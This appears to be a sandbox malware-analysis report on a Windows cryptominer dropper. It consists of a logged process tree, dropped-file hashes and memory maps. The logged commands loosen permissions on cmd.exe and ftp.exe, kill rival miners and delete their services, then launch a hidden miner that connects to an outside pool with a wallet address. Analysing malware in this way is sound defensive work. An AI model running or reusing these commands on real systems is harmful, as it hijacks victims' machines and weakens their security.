C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA AlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WmiPrvSER.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Netsh_Help.dll3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows SystenApp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k >C:\Users\Admin\AppData\Local\Temp\CPU_log.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeC:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempUpdate2.batFilesize
32KB
MD5ec3fa33874b842d0a549688a2ca7723a
SHA17cd48ada26369a3d100ee526717571c5b5b86566
SHA25664a049cf96b48bf4d48945530e2cd4a150d8aac45617cedf986466983169f8aa
SHA512260bf2d6ede6a990c187ff9f6cb768bcadb4be5a1d6676ce3cf318638e4edf251446e061d83d65ab8cfe847301da837c8e880a19383cfb4b5bf06c5a9fa28d61
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeFilesize
7.8MB
MD59aff07d0416aef82dfa3b31d3518f27d
SHA19ab6f267ab321350d0f5435342abb6cd496e7d23
SHA256d90d67ca00b1bb32159d404be012f8c32197e367a88974df592cd975ec1fb706
SHA512f3eda82e8f9471a93a73b8817bc997ba2f1c6126894051066db47b5503036f594c82973504b908c9abac09e881b2421aca6aa51ada4e7891d966e1dba33d57b2
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeFilesize
7.8MB
MD59aff07d0416aef82dfa3b31d3518f27d
SHA19ab6f267ab321350d0f5435342abb6cd496e7d23
SHA256d90d67ca00b1bb32159d404be012f8c32197e367a88974df592cd975ec1fb706
SHA512f3eda82e8f9471a93a73b8817bc997ba2f1c6126894051066db47b5503036f594c82973504b908c9abac09e881b2421aca6aa51ada4e7891d966e1dba33d57b2
-
memory/112-143-0x0000000000000000-mapping.dmp
-
memory/308-142-0x0000000000000000-mapping.dmp
-
memory/528-149-0x0000000000000000-mapping.dmp
-
memory/552-199-0x0000000000400000-0x0000000000561000-memory.dmpFilesize
1.4MB
-
memory/552-133-0x0000000002390000-0x000000000239B000-memory.dmpFilesize
44KB
-
memory/552-134-0x0000000002390000-0x000000000239B000-memory.dmpFilesize
44KB
-
memory/552-132-0x0000000000400000-0x0000000000561000-memory.dmpFilesize
1.4MB
-
